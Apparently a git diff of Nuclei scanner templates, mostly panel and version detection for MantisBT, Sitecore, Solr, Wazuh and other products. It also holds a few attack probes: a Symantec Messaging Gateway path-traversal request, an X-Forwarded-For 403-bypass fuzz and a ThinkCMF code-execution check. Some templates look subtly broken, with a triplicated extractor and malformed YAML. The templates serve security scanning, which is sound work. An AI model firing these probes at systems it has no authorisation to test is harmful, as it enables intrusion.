"{{BaseURL}}/images/mantis_logo_notext.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"660dad7e454149d5999662b4373157c7\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"aa73acc7eca548d34aadd51554663e88\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"a00d92e145f7c65f846ae095d2bb24eb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/modern_my_view.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"412ddece068b347490a78be5f6af1864\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"ad59a62de9e23e595c9d1f03c4a0d71e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/modern_view_issue.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"f6e082cd5ef135f32b06c6f2f3174950\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"2d0f3f8ec166eea9e55a7aaf4ce03491\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/modern_view_issues.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"48a65843581cbd03ec6187eacd426832\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"d2a882327af6100a0e266b16d56ce386\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/images/mantis_logo.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"6f6f731ce54f063ef1020ad6cf8596d3\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"ba46364c699a330ee0aad0013db3054b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"9ae11327423fda16d18ed021fe5c20f1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/relationship.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.22.2 + dsl: + - "(\"f67dca4f493c78c3bd99c25457452079\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"c9cbb42d2daa915c0079d41d5df12f6e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/uploads.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"3b4079c8bf31929931e2df242913801d\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"42872c7bd7f239d381739ba716838678\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"b7e2a4311da0502ce97f655d7a9e5787\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/erd/README.md" + + matchers: + - type: dsl + name: 1.3.0 - 2.22.2 + dsl: + - "(\"623223a0d50d08c79bdfc3cdf47e6fa7\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"e9b3d8670835cc199f06363c6435e9ba\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/erd/mantisbt.mwb" + + matchers: + - type: dsl + name: 1.3.0 - 2.22.2 + dsl: + - "(\"8975df5a516b8f4fc136d0f9c80f3190\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"3da5a6c4972d71bd0a668caa4075dcde\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"154ff3f99a2233623932791d81b7ee78\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/images/mantis_logo.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"6f6f731ce54f063ef1020ad6cf8596d3\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"ba46364c699a330ee0aad0013db3054b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"9ae11327423fda16d18ed021fe5c20f1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/images/erd.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"d9460141201a54306db72cd90af55e54\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"dd897750b824fa9a6d20a8570a3adfcd\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"95892b78ac6207b750c73086f46eb260\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_slovak.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.14.0 + dsl: + - "(\"13bb5b813f49d7b1c953e8ca82cc9fd7\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"880eb08ac9557c84e0e84bc2da3cfdb4\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"e7561a0f9680b04059fa1864a8f44540\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"63211ef93d5ba4641157a1d3cdf3019c\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"b7e6e60ae726efb4a2799cbdc65f11b0\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c46c7ac33e6478ea96a3a233fa07bb86\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"1107f5557922743f3ef839720ad7e117\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"2ae2874e5c70c305b3ff240ee06b389c\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"c06d0414457bfd72fd467c0421458d5d\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.22.2 + dsl: + - "(\"c577b0830123ee8dec64c6ebaed42eab\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"09f287797365f34cca61caff6dd0175a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_polish.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.14.0 + dsl: + - "(\"72a7a65d3dffbe1c1465e27d17afd3c7\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"f7dde2bb2400d3044b1c170a9b15e2fd\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"844b7915807f385052c19404b6aee472\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"63b1df649c0cc43b707bd37d83056ac2\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"9070a81a3860cda91bd647b7a9c4414c\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"24440f9e75562c75854cb3dec421844a\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"8c271f6d635a66820fba7358e74ee33f\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"4e6a9f3255284a3a398bbe3878c9ce07\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"2d8583373de9434e6701af4ec5395536\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.22.2 + dsl: + - "(\"64695fb96a5582dc38de8fb9586dbcc9\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"e69f68bfe320cb27894f3cf020c488c5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_hungarian.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.7.1 + dsl: + - "(\"b523d34ccf363556823116a0ded8c153\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.4.2 + dsl: + - "(\"f3432b8202f5a6c7aca7d1a303c35fc7\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"9a28f8309b33edecf3b0ed44b5d7ef36\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"39f5b8b3fe14b08a6583e854e63c0f73\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"d8dc28990c4f0c826fcdeea101db591c\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"68f5eea154db319a1febd86814be049c\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"e321ad2f21ffba70a129caa49b3894ce\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"880c1459ee7ba1d06b1797fdf24a4691\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"1f0a8ea65e67bd7473c012fa1e838d12\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"0b0be170286e139de0d2258e0af308a3\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"5e3b384c113f530fc95de022c7aeb0a0\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"84df7a1bdf2d899dbd342841bd8786e9\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.20.1 + dsl: + - "(\"3aa3f6259ab4a3af876b9a79bcc00310\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.22.2 + dsl: + - "(\"3321c1237634403d951c0a028b0514ea\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"1fa392b019dabfb85ebc7c6e031f6a7f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/moment-with-locales-2.24.0.min.js" + + matchers: + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"1b1c80b617bfcaf8c0766d41c4a3c680\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/typeahead.jquery-1.3.0.min.js" + + matchers: + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"886daa0d33625c72b849bf22026760e2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/erd/mantisbt_2.23.0_210_erd_r2.pdf" + + matchers: + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"9b30d03c663b6527bfd2d64ea7cdd2f2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_en-gb.txt" + + matchers: + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"1b1eb129b788a5b5cff40440b81e3ac8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_turkish.txt" + + matchers: + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"6b1977e601866164743de96b0f743bbd\" == md5(body))" diff --git a/poc/other/sitecore-version-10292.yaml b/poc/other/sitecore-version-10292.yaml index 86162259c6..5cb93e5c4e 100644 --- a/poc/other/sitecore-version-10292.yaml +++ b/poc/other/sitecore-version-10292.yaml @@ -1,25 +1,50 @@ id: sitecore-version + info: name: Sitecore version detection author: bernardofsr severity: info + reference: + - https://www.cvedetails.com/vulnerability-list/vendor_id-9609/Sitecore.html + metadata: + max-request: 1 tags: sitecore,tech - reference: https://www.cvedetails.com/vulnerability-list/vendor_id-9609/Sitecore.html -requests: + +http: - method: GET path: - "{{BaseURL}}/sitecore/shell/sitecore.version.xml" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "Sitecore Corporation" part: body + extractors: - type: regex group: 1 regex: - "([0-9]+)" + + - type: regex + group: 1 + regex: + - "([0-9]+)" + + - type: regex + group: 1 + regex: + - "([0-9]+)" + + - type: regex + group: 1 + regex: + - "([0-9]+)" + +# digest: 4a0a0047304502210088716c595b77a89f541e7eccb401ec7a791f8be721a53410bec7c04ec13dadb70220659bc8c9488c0c78b0bbc20b4c5bcfdd3e90c0bb24342aff2d9439af166bf213:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/sitecore-workflow-10293.yaml b/poc/other/sitecore-workflow-10293.yaml index 2dc2a27e36..cfeab5b32a 100644 --- a/poc/other/sitecore-workflow-10293.yaml +++ b/poc/other/sitecore-workflow-10293.yaml @@ -6,6 +6,8 @@ info: description: A simple workflow that runs all SiteCore related nuclei templates on a given target. workflows: - - template: technologies/default-sitecore-page.yaml + - template: technologies/sitecore-default-page.yaml + - template: exposed-panels/sitecore-login.yaml subtemplates: - - tags: sitecore \ No newline at end of file + - tags: vulnerabilities/sitecore-pre-auth-rce.yaml + - template: misconfiguration/sitecore-debug-page.yaml \ No newline at end of file diff --git a/poc/other/skycaiji-admin-panel-10306.yaml b/poc/other/skycaiji-admin-panel-10306.yaml index e83c2814df..8a3839310e 100644 --- a/poc/other/skycaiji-admin-panel-10306.yaml +++ b/poc/other/skycaiji-admin-panel-10306.yaml @@ -3,7 +3,7 @@ info: name: SkyCaiji Admin Panel author: princechaddha severity: info - tags: panel,tech,skycaiji + tags: panel,tech requests: - method: GET path: diff --git a/poc/other/skycaiji-install.yaml b/poc/other/skycaiji-install.yaml index b88e58204b..21aee2952f 100644 --- a/poc/other/skycaiji-install.yaml +++ b/poc/other/skycaiji-install.yaml @@ -1,9 +1,8 @@ id: skycaiji-install info: - name: SkyCaiji - Exposed Installation + name: SkyCaiji Exposed Installation author: pikpikcu severity: high - description: SkyCaiji was discovered. tags: tech,skycaiji,exposure,misconfig requests: - method: GET @@ -21,5 +20,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/21 diff --git a/poc/other/solr-query-dashboard.yaml b/poc/other/solr-query-dashboard.yaml index bd062e78f8..f1cd3dea51 100644 --- a/poc/other/solr-query-dashboard.yaml +++ b/poc/other/solr-query-dashboard.yaml @@ -1,20 +1,28 @@ id: solr-admin-query + info: - name: Solr Admin Query Page + name: Solr - Admin Page Access author: dhiyaneshDK - severity: High - reference: https://www.exploit-db.com/ghdb/5856 + severity: high + description: Solr's admin page was able to be accessed with no authentication requirements in place. + reference: + - https://www.exploit-db.com/ghdb/5856 tags: solr,unauth + requests: - method: GET path: - '{{BaseURL}}/admin/' - '{{BaseURL}}/solr/admin/' + matchers-condition: and matchers: - type: word words: - 'Solr admin page' + - type: status status: - 200 + +# Enhanced by mp on 2022/07/21 diff --git a/poc/other/sonarqube-public-projects.yaml b/poc/other/sonarqube-public-projects.yaml index f2f5e5dbf1..a2aad16212 100644 --- a/poc/other/sonarqube-public-projects.yaml +++ b/poc/other/sonarqube-public-projects.yaml @@ -3,9 +3,8 @@ info: name: Sonarqube with public projects author: sickwell severity: low - reference: - - https://next.sonarqube.com/sonarqube/web_api/api/components/suggestions?internal=true tags: sonarqube,misconfig + reference: https://next.sonarqube.com/sonarqube/web_api/api/components/suggestions?internal=true requests: - method: GET path: diff --git a/poc/other/sonicwall-management-panel-10387.yaml b/poc/other/sonicwall-management-panel-10387.yaml index 67b123d0cf..4af9aae59d 100644 --- a/poc/other/sonicwall-management-panel-10387.yaml +++ b/poc/other/sonicwall-management-panel-10387.yaml @@ -1,9 +1,11 @@ id: sonicwall-management-panel + info: name: SonicWall Management Panel author: PR3R00T severity: info - tags: panel + tags: panel,sonicwall + requests: - method: GET path: diff --git a/poc/other/spoofable-spf-records-ptr-10426.yaml b/poc/other/spoofable-spf-records-ptr-10426.yaml index 993131749a..60c285c7b4 100644 --- a/poc/other/spoofable-spf-records-ptr-10426.yaml +++ b/poc/other/spoofable-spf-records-ptr-10426.yaml @@ -1,22 +1,18 @@ id: spoofable-spf-records-ptr info: - name: Spoofable SPF Records with PTR Mechanism + name: Find spoofable SPF records containing the PTR mechanism author: binaryfigments severity: info - description: SPF records in DNS containing a PTR mechanism are spoofable. - reference: - - https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability - classification: - cwe-id: CWE-200 - tags: dns,spf + description: Check if TXT records in DNS for SPF records that have the PTR mechanism that is spoofable. dns: - name: "{{FQDN}}" type: TXT + class: inet + recursion: true + retries: 3 matchers: - type: word words: - "v=spf1" - " ptr " condition: and - -# Enhanced by mp on 2022/03/14 diff --git a/poc/other/sugarcrm-panel-10569.yaml b/poc/other/sugarcrm-panel-10569.yaml index b631adf067..c76645fdf8 100644 --- a/poc/other/sugarcrm-panel-10569.yaml +++ b/poc/other/sugarcrm-panel-10569.yaml @@ -1,15 +1,19 @@ id: sugarcrm-panel + info: name: Detect SugarCRM Panel author: johnk3r severity: info - reference: https://www.shodan.io/search?query=sugarcrm + metadata: + shodan-query: http.title:sugarcrm tags: sugarcrm,panel + requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/index.php?action=Login&module=Users" + stop-at-first-match: true matchers-condition: and matchers: @@ -17,6 +21,7 @@ requests: part: body words: - "SugarCRM" + - type: status status: - 200 diff --git a/poc/other/supervpn-panel-10575.yaml b/poc/other/supervpn-panel-10575.yaml index acc35a15e9..7b42b90a1d 100644 --- a/poc/other/supervpn-panel-10575.yaml +++ b/poc/other/supervpn-panel-10575.yaml @@ -3,6 +3,7 @@ info: name: SuperVPN panel detect author: organiccrap severity: info + tags: panel requests: - method: GET path: diff --git a/poc/other/supervpn-panel.yaml b/poc/other/supervpn-panel.yaml index acc35a15e9..017194340c 100644 --- a/poc/other/supervpn-panel.yaml +++ b/poc/other/supervpn-panel.yaml @@ -1,8 +1,10 @@ id: supervpn-detect + info: name: SuperVPN panel detect author: organiccrap severity: info + requests: - method: GET path: diff --git a/poc/other/symantec-messaging-gateway-10609.yaml b/poc/other/symantec-messaging-gateway-10609.yaml index 72a8c40af6..ab5c216ab1 100644 --- a/poc/other/symantec-messaging-gateway-10609.yaml +++ b/poc/other/symantec-messaging-gateway-10609.yaml @@ -1,19 +1,23 @@ id: symantec-messaging-gateway + info: name: Symantec Messaging Gateway LFI - author: Random-Robbie + author: Random_Robbie severity: medium description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal - tags: lfi + tags: lfi,messaging,symantec + requests: - method: GET path: - "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/" + matchers-condition: and matchers: - type: word words: - "struts-default.xml" + - type: status status: - 200 diff --git a/poc/other/tectuus-scada-monitor.yaml b/poc/other/tectuus-scada-monitor.yaml index 65164a60b4..ef44c69a43 100644 --- a/poc/other/tectuus-scada-monitor.yaml +++ b/poc/other/tectuus-scada-monitor.yaml @@ -2,9 +2,9 @@ id: tectuus-scada-monitor info: name: Tectuus SCADA Monitor - reference: https://www.tectuus.mx/ author: geeknik severity: info + reference: https://www.tectuus.mx/ tags: panel,tectuus,scada requests: @@ -12,17 +12,13 @@ requests: path: - "{{BaseURL}}" - redirects: true matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - "SCADmonitor" - "SCADAmonitor" - condition: or - - type: word - words: - - "SCADAmonitor y su logo son propiedad de tectuus®" + part: body diff --git a/poc/other/teradici-pcoip-10704.yaml b/poc/other/teradici-pcoip-10704.yaml index d545818f79..72f8e4d980 100644 --- a/poc/other/teradici-pcoip-10704.yaml +++ b/poc/other/teradici-pcoip-10704.yaml @@ -3,11 +3,6 @@ info: name: Teradici PCoIP Detection author: pdteam severity: info - description: Teradici PColP was detected. - reference: - - https://www.teradici.com/ - classification: - cwe-id: CWE-200 tags: tech,pcoip requests: - method: GET @@ -22,5 +17,3 @@ requests: group: 1 regex: - 'PCoIP Connection Manager\/([0-9.]+)\.' - -# Enhanced by mp on 2022/03/24 diff --git a/poc/other/thinkcmf-arbitrary-code-execution.yaml b/poc/other/thinkcmf-arbitrary-code-execution.yaml index b35db666c5..8c39496bf3 100644 --- a/poc/other/thinkcmf-arbitrary-code-execution.yaml +++ b/poc/other/thinkcmf-arbitrary-code-execution.yaml @@ -1,17 +1,14 @@ id: thinkcmf-arbitrary-code-execution - info: name: ThinkCMF Arbitrary code execution author: pikpikcu severity: high reference: https://www.shuzhiduo.com/A/l1dygr36Je/ tags: thinkcmf - requests: - method: GET path: - "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=" part: body condition: and - extractors: - type: regex name: model diff --git a/poc/other/ups-status-10984.yaml b/poc/other/ups-status-10984.yaml index 33349641e0..481f53a7e8 100644 --- a/poc/other/ups-status-10984.yaml +++ b/poc/other/ups-status-10984.yaml @@ -1,20 +1,24 @@ id: ups-status + info: name: Multimon UPS status page author: dhiyaneshDK severity: low reference: https://www.exploit-db.com/ghdb/752 tags: logs,status + requests: - method: GET path: - "{{BaseURL}}/cgi-bin/apcupsd/multimon.cgi" - "{{BaseURL}}/cgi-bin/multimon.cgi" + matchers-condition: and matchers: - type: word words: - "Multimon: UPS Status Page" + - type: status status: - 200 diff --git a/poc/other/voipmonitor-workflow.yaml b/poc/other/voipmonitor-workflow.yaml index 3082fdc3f2..a007c4a27c 100644 --- a/poc/other/voipmonitor-workflow.yaml +++ b/poc/other/voipmonitor-workflow.yaml @@ -6,6 +6,6 @@ info: description: A simple workflow that runs all VoipMonitor related nuclei templates on a given target. workflows: - - template: technologies/voipmonitor-detect.yaml + - template: exposed-panels/voipmonitor-panel.yaml subtemplates: - tags: voipmonitor diff --git a/poc/other/wago-plc-panel.yaml b/poc/other/wago-plc-panel.yaml index 5335aaa161..849ddd5515 100644 --- a/poc/other/wago-plc-panel.yaml +++ b/poc/other/wago-plc-panel.yaml @@ -3,7 +3,7 @@ info: name: WAGO PLC Panel author: github.com/its0x08 severity: info - tags: panel,wago + tags: panel requests: - method: GET path: diff --git a/poc/other/wazuh-panel.yaml b/poc/other/wazuh-panel.yaml index fb26c6e3a6..51f8a0dd93 100644 --- a/poc/other/wazuh-panel.yaml +++ b/poc/other/wazuh-panel.yaml @@ -1,5 +1,4 @@ id: wazuh-panel - info: name: Wazuh Login Panel author: cyllective,daffainfo @@ -10,12 +9,10 @@ info: metadata: shodan-query: http.title:"Wazuh" tags: panel,wazuh,login - requests: - method: GET path: - "{{BaseURL}}/app/login" - matchers-condition: and matchers: - type: word @@ -26,14 +23,12 @@ requests: - '"icon":"plugins/wazuh/img/icon_blue.png"' - '"url":"/app/wazuh"' condition: or - - type: status status: - 200 - extractors: - type: regex part: body group: 1 regex: - - '"version":"([0-9.]+)"' \ No newline at end of file + - '"version":"([0-9.]+)"' diff --git a/poc/other/weatherlink-11115.yaml b/poc/other/weatherlink-11115.yaml index 3f9d994189..61a45448ca 100644 --- a/poc/other/weatherlink-11115.yaml +++ b/poc/other/weatherlink-11115.yaml @@ -1,17 +1,15 @@ id: weatherlink-configuration - info: name: WeatherLinkIP Configuration author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6007 + reference: + - https://www.exploit-db.com/ghdb/6007 tags: panel - requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word diff --git a/poc/other/workspace-one-uem-11393.yaml b/poc/other/workspace-one-uem-11393.yaml index 73a1bf2608..fe79a85764 100644 --- a/poc/other/workspace-one-uem-11393.yaml +++ b/poc/other/workspace-one-uem-11393.yaml @@ -3,8 +3,7 @@ info: name: Workspace ONE UEM AirWatch Login Page author: gevakun severity: info - reference: - - https://twitter.com/Jhaddix/status/1295861505963909120 + reference: https://twitter.com/Jhaddix/status/1295861505963909120 tags: panel,workspaceone,login requests: - method: GET diff --git a/poc/other/wso2-management-console.yaml b/poc/other/wso2-management-console.yaml index 2738846f21..9e7e825f86 100644 --- a/poc/other/wso2-management-console.yaml +++ b/poc/other/wso2-management-console.yaml @@ -4,7 +4,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/5691 - tags: panel + tags: panel,wso2 requests: - method: GET path: diff --git a/poc/other/xds-amr-status.yaml b/poc/other/xds-amr-status.yaml index 6055599dcf..a7f548a112 100644 --- a/poc/other/xds-amr-status.yaml +++ b/poc/other/xds-amr-status.yaml @@ -1,26 +1,31 @@ -id: xds-amr-status -info: - name: XDS-AMR - status - author: pussycat0x - severity: info - metadata: - shodan-dork: 'http.title:"XDS-AMR - status"' - tags: panel,tech,xamr,xds -requests: - - method: GET - path: - - "{{BaseURL}}/login.php" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'XDS-AMR - Status' - - type: status - status: - - 200 - extractors: - - type: regex - part: body - regex: - - 'XAMR\-([0-9]+)' +id: xds-amr-status + +info: + name: XDS-AMR - status + author: pussycat0x + severity: info + metadata: + shodan-dork: 'http.title:"XDS-AMR - status"' + tags: panel,tech,xamr,xds + +requests: + - method: GET + path: + - "{{BaseURL}}/login.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'XDS-AMR - Status' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'XAMR\-([0-9]+)' diff --git a/poc/other/xff-403-bypass-11685.yaml b/poc/other/xff-403-bypass-11685.yaml index 61a9f441c8..7d54a12b98 100644 --- a/poc/other/xff-403-bypass-11685.yaml +++ b/poc/other/xff-403-bypass-11685.yaml @@ -1,35 +1,42 @@ id: xff-403-bypass - info: name: X-Forwarded-For 403-forbidden bypass author: vavkamil severity: info description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. - tags: fuzz - + tags: xff,bypass,fuzz requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 + Connection: close Accept: */* - + Accept-Language: en + Accept-Encoding: gzip - | GET / HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 + Connection: close Accept: */* + Accept-Language: en + Accept-Encoding: gzip X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 - - | GET /test.txt HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 + Connection: close Accept: */* + Accept-Language: en + Accept-Encoding: gzip X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 - req-condition: true matchers: - type: dsl dsl: - "status_code_1 == 403 && status_code_2 != 403" - "status_code_1 == 403 && status_code_3 != 403" - condition: or \ No newline at end of file + condition: or diff --git a/poc/other/xxljob-panel.yaml b/poc/other/xxljob-panel.yaml index ba4161b984..3fd00d6650 100644 --- a/poc/other/xxljob-panel.yaml +++ b/poc/other/xxljob-panel.yaml @@ -1,22 +1,27 @@ id: xxljob-panel + info: name: XXLJOB Admin Login Panel author: pdteam,daffainfo severity: info tags: panel,xxljob,login + requests: - method: GET path: - "{{BaseURL}}/xxl-job-admin/toLogin" + matchers-condition: and matchers: - type: word part: body words: - "XXLJOB" + - type: status status: - 200 + extractors: - type: regex part: body diff --git a/poc/other/yopass-panel.yaml b/poc/other/yopass-panel.yaml index 27e0187e51..9b8380aba9 100644 --- a/poc/other/yopass-panel.yaml +++ b/poc/other/yopass-panel.yaml @@ -3,9 +3,9 @@ info: name: Yopass Application Exposure author: Adam Crosser severity: info - metadata: - shodan-query: title:"Yopass" tags: panel,yopass + metadata: + shodan-query: 'title:"Yopass"' requests: - method: GET path: diff --git a/poc/other/zabbix-dashboards-access.yaml b/poc/other/zabbix-dashboards-access.yaml index 3177c353c9..2d199e9b32 100644 --- a/poc/other/zabbix-dashboards-access.yaml +++ b/poc/other/zabbix-dashboards-access.yaml @@ -3,10 +3,14 @@ info: name: zabbix-dashboards-access author: pussycat0x,vsh00t severity: medium - description: View dashboard with guest login. + description: zabbix-dashboards-access guest login credentials were successful. reference: - https://www.exploit-db.com/ghdb/5595 - https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 tags: zabbix,unauth requests: - method: GET @@ -22,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/14 diff --git a/poc/other/zte-panel-11841.yaml b/poc/other/zte-panel-11841.yaml index 2c56774979..efaad36a63 100644 --- a/poc/other/zte-panel-11841.yaml +++ b/poc/other/zte-panel-11841.yaml @@ -1,34 +1,24 @@ id: zte-panel + info: name: ZTE Panel - author: its0x08,idealphase + author: github.com/its0x08 severity: info - description: | - ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe.ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe. - reference: - - https://www.zte.com.cn/global/ - metadata: - verified: true - shodan-query: http.html:"ZTE Corporation" tags: panel,zte + requests: - method: GET path: - "{{BaseURL}}" matchers: - type: word - part: body words: - "ZTE Corporation. All rights reserved. " - '
' + part: body condition: and + - type: word - part: header words: - "Mini web server 1.0 ZTE corp 2005." - extractors: - - type: regex - part: body - group: 1 - regex: - - '
